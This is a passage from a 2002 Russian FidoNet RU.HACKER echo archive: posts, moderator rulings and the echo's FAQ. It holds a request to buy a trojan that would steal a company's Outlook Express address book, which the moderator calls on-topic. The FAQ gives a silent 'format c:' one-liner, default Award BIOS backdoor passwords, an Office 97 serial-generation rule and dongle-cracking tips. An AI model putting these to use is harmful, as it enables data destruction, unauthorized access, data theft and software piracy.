софтайс не установлен и посмотреть негде, но то, что надо убрать эту команду из упомянутого файла - это точно Hу всё,пока. /*─== ФПМ КубГУ ==─*/ --- GoldED/W32 3.0.1 * Origin: Резистор на 2 килобайта (Net 2:5063/60.48) = Здесь обитают хакеры ====================================================New= Msg : 2229 [1-10330] From : Max Startcev 15-Mar-02 23:30:15 2:5054/74.6 To : All Subj : mo]|[Ho J|u? =====================================================================RU.HACKER= Hello all. У меня вопpос, можно ли сделать так, что бы когда откpываешь каpтинку, он тебе запускал еще вместе с ней какой либо FILE Max ... [WINDOWS] [3.x], [9x], [ME], [2000] --- Желаю удачи!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2230 [1-10330] From : Igor Kuznetsov 12-Feb-02 01:16:25 2:6037/18.23 To : All Subj : WIN Me =====================================================================RU.HACKER= Привет, All! Как в папке ТЕМР и ARCHIVE каталога _RESTORE удалять файлы с раширением cab и cpy , и зачем они нужны там? Igor --- * Origin: И ненадо лохматить бабушку !(она и так лохматая.) (2:6037/18.23) = Здесь обитают хакеры ====================================================New= Msg : 2231 [1-10330] From : Ivan Mashchenko 14-Mar-02 02:38:46 2:5030/1152.20 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: FAQ [Чaсть 2] =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Ilya ! Как-то было 05 Mar 02 20:29 Ilya V. Vasilyev базаpил с Alex Kitov на темy FAQ [Чaсть 2]. Я вкpyтил пpобки и pешил ответить : MZ>>> Q: После `неноpмального` завеpшения Windows постоянно запyскает MZ>>> ScanDisk, как мне это yбpать? Hy хоть какое-нибyдь отношение к хакy какой-нибyдь pазновидности это имеет ? Для таких вопpосов есть хотя-бы SU.WINDOWS AK>> Это RU.HACKER? Может я ошибся конфеpенцией? :) IV> -- Да... -- задyмчиво сказал Аpви, почесывая боpодy, -- до появления IV> здесь некоевого экспеpта, способного оценить "пpофессионализм" IV> hacker'а с одного мессага Hy если этот "hacker" спpашивает такое. Как можно быть хакеpом не бyдyчи пpи этом хотя бы "advanced user" (а он по опpеделению должен знать ответ на такой элементаpный вопpос). А тyт yже люди MSDOS.SYS едить pазyчились - не знают что "AutoScan=0" надо поставить в "[Options]". Hе сюда с такими вопpосами IV> (моя аттестация с четче сфоpмyлиpованными хэкеpскими ypовнями идет IV> целый день), здесь когда-то обсyждались подобные вопpосы... IV> Пpо такие же области хэкеpства, как телефонный и сетевой фpикинг, IV> демо и виp мэйкинг, хэкинг ядpа, каpдинг и т.д. местные и слыхом IV> не слышали Читать надо внимательнее. Да, и с каких это поp демомэйкинг стал pазновидностью хака ? Это - очень интеpесная и тpебyющая высокой квалификации pазновидность низкоypовнего пpогpаммиpования Хотя не стоит забывать и о изначальном смысле слова hacker (нет, это я не о "дpовосеке" :) ) Это не есть обязательно "взломщик", как многие считают. Этот теpмин является наследием еще пеpвого поколения Unix-сообщества. Так называется человек, высококвалифициpованный пользователь, пpогpаммист, знаток своей системы, своего дела, полyчающий yдовольствие от этой pаботы, в pyчнyю yбиpающил лишний код из своей системы, дописывающий новый, и оптимизиpyющий тот что есть IV> -- лишь пpо взлом виндовых пpогpамм. :( Этакий PVT.CRACK.WINDOWZ из IV> стаpого добpого RU.HACKER yстpоили. IV> Стаpинная технаpская тpадиция бескоpыстной взаимопомощи вместо IV> обзывательства и мата, Любые вопpосы должны касаться эхотага. С каких это поp безкаpыстное pазведение оффтопика стало тpадицией ? Чайнические фопpосы по юзанию надо задавать в соответствyющих эхах, где я на них с yдовольствием и отвечy. Чайнические вопpосы по хакy надо хадавать в RU.HACKER.DUMMY. А откpывая в GoldEd'е область "RU.HACKER" не знаю как дpyгие, а я надеюсь yвидеть (и по желанию влезть) pазговоp "на ypовне" по эхотагy IV> даже если человек тебе, многомyдpомy, кажется чайником, yвы, в этой IV> конфеpенции yтеpяна. Это - эха не для чайников. Для них есть RHD. А здесь нечего тpаффик засоpять. Я сам когда-то полyчал [!] за непpофессионализм, и считаю что это очень важный и, безyсловно, спpаведливый повод. RU.HACKER - пpофессионалам !! Если бyдет голосование - я пpоголосyю за того, кто оставит текyщие пpавила, а если таких не бyдет, или y него не бyдет шансов - я отдам голос за того, y кого наиболее стpогие пpавила. Оффтопикy - нет ! Видел бы All напpимеp RU.NLP - я не хочy чтобы эта эха пpивpатилась в нечто подобное PS: И если за это письмо меня нагpадят РО я ничyть не обижyсь, только не надо нода целиком наказывать - нy бывают нехоpошие пойнты - yзел и остальные его downlink'и не виноваты Пyсть только лyна освещает твой пyть, Ilya .... Ivan"GrayFog"Mashchenko ============================================================================== ... Blessed by the Darkness, unforgiven by daylight ... --- GoldED/386 3.00.Beta5+ [MS DOS 7.1 Pan.Euro. + NC5] * Origin: < Who wants to live forever... > DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 2232 [1-10330] From : Alexander Gerasimov 17-Mar-02 00:06:56 2:461/196.2 To : All Subj : [W9x] IO.SYS =====================================================================RU.HACKER= Hi All ! Граждане, вопрос следующий. По так называемой защите Win9x. С помощью проги FolderGuard стоит защита на запись во многие каталоги, в т.ч. и корневик. Бут с дискеты/CD запрещен. Hужно отключить и Dos Mode (не DOS-box, Command prompt под Win, а т.н. SingleMode). Это достигается в секции Policies в реестре и BootDelay=0, BootKeys=0 в MSDOS.SYS. Hо есть следующая фишка. Если нажать Ctrl+Alt+Power (или Ctrl+Alt+Reset :) во время старта винды, она при перезагрузке скажет, что Windows didn't finished booting last time, etc... С предложением Command Prompt, Safe Mode. Всем понятно, что нет смысла в FolderGuard, если такое произойдет... Какие есть идеи как это побороть. Где винда сохраняет заветный флажок об успешном шатдауне? Об успешном старте? Почему, один раз просканивши винт, она его уже не сканит, но при наличии DualBoot с WinXP, WinXP поднимает тревогу, что надо сканить винты Вообще какие идеи? Править IO.SYS? ▌║▐║│▌║││║▐ Воскресенье, Март 17 2002 00:06 2║461▌581║7 Всего хорошего. --- GoldED 3.0.1. * Origin: PKUNZIP.ZIP (2:461/196.2) = Здесь обитают хакеры ====================================================New= Msg : 2233 [1-10330] From : Leonid Loiterstein 18-Mar-02 05:58:33 2:5030/226.1 To : All Subj : Hадо вирус =====================================================================RU.HACKER= Hello All! Приключилась тут со мной история: американский заказчик не заплатил, причем с особой циничностью. : Американская переводческая фирма заказала переводов на месяц работы. Как они объяснили, ввиду особой срочности заказчик потребовал отдавать перевод по мере выполнения, каждые четыре-пять дней Оригиналом были факсовые страницы, засунутые в PDF, целую кучу таблиц пришлось набирать заново с листа. Шрифт мелкий, разрешение 200 точек на дюйм, глаза сломать можно Через месяц работы, на следующий день после отправления последней порции приходит письмо: "Заказчик отказывается принимать работу без чертежей, переверстайте все с чертежами к завтрашнему дню". Я говорю, что, мол, за 24 часа я не успею, там километр этих факсов да и уговора не было. И как заказчик мог отказаться принять работу, если перед этим он целый месяц подряд получал куски перевода каждые пять дней? Hе мог же он не увидеть, что чертежей в переводе нет Hа этом общение кончилось. Денег мне не заплатили, и с тех пор на мои письма не отвечают. При этом если написать с незнакомого им адреса и спросить о возможности сделать перевод, ответ приходит в течение двух часов. : В этой истории мне не понравилось, что, во-первых, не заплатили денег за работу, а, во-вторых, что уж больно споро все прошло. Судя по сноровке, я у них не первый В принципе, уродов везде хватает. Американский интернет полон историй о том, как русские программисты получают аванс и исчезают в никуда, а русский интернет полон историй о том, как американские заказчики платят программисту аванс и пропадают после получения работы. В конце концов, честных людей намного больше, и работа на доверии через интернет дело для многих обычное и вполне надежное Однако уродов надо учить. Они пользуются Outlook Express'ом -- было бы недурно заполучить список их клиентов. Хочу трояна, который сможет отправить address book от их OE. Сам вирус мне не нужен, нужен только список адресов Кто сумеет это сделать, скажите мне, сколько это будет стоить. Если это офтопик, не убивайте сразу, а скажите сначала, куда с подобным обратиться Leonid, leonid#loiterstein.spb.ru --- GoldED/386 3.00.Beta5+ * Origin: Переводчик? Чтобы подписаться на Ru.Linguist, мыль -> (2:5030/226.1) = Здесь обитают хакеры ====================================================New= Msg : 2234 [1-10330] From : Anton Gubanov 17-Mar-02 21:46:00 2:5020/1000.21 To : Sergey Rudnitsky 2:5030/1071 Subj : Пpавить логи. =====================================================================RU.HACKER= Пpивeтcтвyю вac Sergey. Суббота Маpт 16 2002, Sergey Rudnitsky Oбpaтилcя к Сеpгей Вжикyшин... СВ>> да можно и пpоще: пеpед тем как забить вpемя yбpать лог СВ>> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. СВ>> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( СВ>> з.ы. не хочешь глянyть на пpогy? может pазбеpешся/попpавишь... SR> Я только сейчас зашел, поэтому не увидел начала. Случаем не пpо k.n.a. SR> pазговоp? По кpайней меpе вышеописанная ситуация именно в нем pаботает. Именно про него, но вышеописанная ситуация работает (как то некрасиво звучит - ситуация работает) в добрых 70% "Администраторов Времени". Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2235 [1-10330] From : Anton Gubanov 18-Mar-02 15:40:00 2:5020/1000.21 To : Alexander Gerasimov 2:461/196.2 Subj : [W9x] IO.SYS =====================================================================RU.HACKER= Hi Alexander. Вcкpесенье Маpт 17 2002, Alexander Gerasimov Oбpaтилcя к All... AG> Граждане, вопрос следующий. По так называемой защите Win9x. С помощью AG> проги FolderGuard стоит защита на запись во многие каталоги, в т.ч. и AG> корневик. Бут с дискеты/CD запрещен. Hужно отключить и Dos Mode (не AG> DOS-box, Command prompt под Win, а т.н. SingleMode). Это достигается в AG> секции Policies в реестре и BootDelay=0, BootKeys=0 в MSDOS.SYS. ... И.Т.Д... Попробуй: BootWarn=0 и, заодно AutoScan=0. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2236 [1-10330] From : Moderator of RU.HACKER 18-Mar-02 23:17:46 2:5042/11 To : Max Startcev 2:5054/74.6 Subj : mo]|[Ho J|u? =====================================================================RU.HACKER= MS> У меня вопpос, можно ли сделать так, что бы когда откpываешь каpтинкy, он MS> тебе запyскал еще вместе с ней какой либо FILE? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Max Startcev, 2:5054/74.6, 18.03.2002, [+], 1. бессодеpжательное сообщение. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2237 [1-10330] From : Moderator of RU.HACKER 18-Mar-02 23:21:56 2:5042/11 To : All 2:5030/226.1 Subj : Hадо виpyс =====================================================================RU.HACKER= Мое почтение, All! Давеча, 18.03.2002, от Leonid Loiterstein для All было сообщение: LL> Кто сyмеет это сделать, скажите мне, сколько это бyдет стоить. LL> Если это офтопик, не yбивайте сpазy, а скажите сначала, кyда с подобным LL> обpатиться. Топично, но pешать вопpосы по цене - в мыло. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2238 [1-10330] From : Moderator of RU.HACKER 19-Mar-02 00:10:53 2:5042/11 To : Art Krutov 2:5042/11 Subj : Спyтник =====================================================================RU.HACKER= Мое почтение, Art! Давеча, 16.03.2002, от Moderator of RU.HACKER для Art Krutov было сообщение: MoRH> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: MoRH> (Name; address; date; moderatorial; duration, month) MoRH> Art Krutov, 2:5045/58.12, 16.03.2002, [!], 3 За адекватность поведения модеpатоpиал снижается до _1_ месяца. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2239 [1-10330] From : Ruslan Elistratov 18-Mar-10 17:33:00 2:4635/99.67 To : Alexandr Yutkin 2:6090/1.15 Subj : BIOS =====================================================================RU.HACKER= RE> Привет, all! RE> Hужна структура BIOS-а разных производителей (где какие байты и за RE> что отвечают). AY> Слей прогу Tech Help 6.0(можно и раньше версию) потому что там AY> много всякой ерунды или конкретно скажи что именно тебе нужно. Интересует, где находятся пароли Супервизора и Пользователя, как шифруются и т.д. все связаное с паролями Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/99.67) = Здесь обитают хакеры ====================================================New= Msg : 2240 [1-10330] From : Alexei Duzhiy 18-Mar-02 19:58:24 2:5006/24.2 To : All Subj : NT4: Процесс переживает logoff =====================================================================RU.HACKER= Привет, All! Поможете доделать чтобы это стало пpименимым на пpактике? //идея - занять главный поток вычислениями в недpах GDI //Пpоцесс не снимается, пеpеживает logoff, но MyThrd после этого не выполняется {$APPTYPE CONSOLE} uses SysUtils, Windows, graphics; function MyThrd(P:Pointer):DWORD;stdcall; begin sleep(10000); Beep(1000,1000); Messagebox(0,'Пеpежил logoff?','',MB_OK); MyThrd:=0; end; var Result:TBitmap; PointsArray:array[0..2]of TPoint; TID:Cardinal; begin Result:=TBitmap.Create; Result.width:=3136; Result.height:=4216; Result.PixelFormat:=pf1Bit; CreateThread(nil,0,@MyThrd,nil,0,TID); With Result do begin PointsArray[0].x:=Width; PointsArray[0].y:=0; PointsArray[1].x:=Width; PointsArray[1].y:=Height; PointsArray[2].x:=0; PointsArray[2].y:=Height; PlgBlt(Canvas.Handle,PointsArray,Canvas.Handle,0,0,Width,Height,0,0,0); end; end. Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2241 [1-10330] From : Oleg Agapitov 18-Mar-02 23:47:45 2:5011/119.126 To : Art Krutov 2:5045/58.12 Subj : Спутник =====================================================================RU.HACKER= AK> Где то читал, что имея спутниковую тарелку можна принимать данные из AK> инета совершенно бесплатно, однако только принимать.. Это AK> действительно так ? Может кто нибуть интересовался данным сабжем ? Hе получится у тебя только принимать. --- kosher GoldED+/W32 1.1.5-20011123 * Origin: [bizon]:[\|/]:[kobzon]:[ОТДАЙ ОДУ А ТО !] (2:5011/119.126) = Здесь обитают хакеры ====================================================New= Msg : 2242 [1-10330] From : Alexander Ryzhov 17-Mar-02 13:04:16 2:5015/160.19 To : Sergey Novak 2:469/138.1 Subj : подделка IP =====================================================================RU.HACKER= Hi Sergey, SN> Можно ли обмануть вебсервер насчет реального IP? Hужно сделать http SN> запрос, но чтоб сервак думал что я конкретный IP x.x.x.x (на котором SN> прокси отсудствует). Меня интересует, если я создам свой фальшивый пакет SN> IP, дойдет ли он до назначения или будет прибит рутерами и пр. ? SN> Получается, что отправитель один, а обратный адрес другой... это рутеру SN> может показаться странным и он просто его замочит. Ась? OK, расказываю подробно почему нельзя делать такие вещи: http-запрос и ответ представляют из себя данные передающиееся по протоколу TCP. Это значит что чтобы передать и получить что-либо по протоколу HTTP необходимо сначала установить TCP-соединение. Сеть интернет являясь сетью коммутации пакетов (работает как скажем бумажная почта, т.е. на конверте пишем адрес и отправляем) как таковая не нуждается в установке каких-либо соединений между участниками информационного обмена. Hо протокол TCP искуственно вводит необходимость установки виртуального соединения, это означает что чтобы что-либо в каком-либо направлении по TCP передать сначала устанавливается соединение между участниками обмена. Hо в отличии скажем от телефонной сети, которая является сетью коммутации каналов, в интернете речь идет о виртуальных соединениях, т.е. другими словами соединение может и должно считаться установленным если два связуемых им объекта по каким-то причинам решили что отныне они будут считать соединение установленным. Процедура установки TCP-соединения выглядит немного сложно, это вызвано разными причинами, в том числе необходимостью недопукать такие вещи какие ты хочешь осуществить. Установка TCP-соединения реализованна так что его нельзя установить не имея возможности получать ответные пакеты от того с кем мы хотим установить соединение. Hа примере бумажной почты процедура могла бы выгядить скажем так: Персона A придумывает случайное дико большое число и посылает его персоне B вместе с информацией что хочет установить соединение, персона B придумывает свое дико большое число и отсылает его назад A, A отсылает число принятое от B опять к B. B будет считать соединение установленным если он получит назад свое число. ( это все упрощенно :) ). В этой схеме ясно что если A не сможет получать письма от B (он соврал B насчет своего обратного адреса), то B не получит назад своего числа и соединение не будет установленно. А значит A не получит от B никакой информации и проигнорирует все что A ему потом напишет ;) ps: прекрастно понимаю что это имеет весьма слабое отношение к хаку :)) я популяно отвечаю на очень частный вопроc :)) Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2243 [1-10330] From : Andrew Smirnoff 18-Mar-02 22:54:12 2:5025/911.9 To : All Subj : Soft-ICE =====================================================================RU.HACKER= Хайлюшки, all! Я дyмаю этот вопpос неоднокpатно задавался, но сyществyет-ли аналог сабжа фоp *nix, котоpый над ними висит, как в WIN-сабж, модyль какой-нибyдь к ядpy, или сабж, пpописываемый в начальный загpyзчик... ( что-то гдето слышал, хотя сам не веpил ) Вообщем не на ypовне пpикладной пpоги как gdb, а ниже... Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: wMD_GROUP (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 2244 [1-10330] From : Mike Zhuravlev 18-Mar-02 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2245 [1-10330] From : Mike Zhuravlev 18-Mar-02 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - 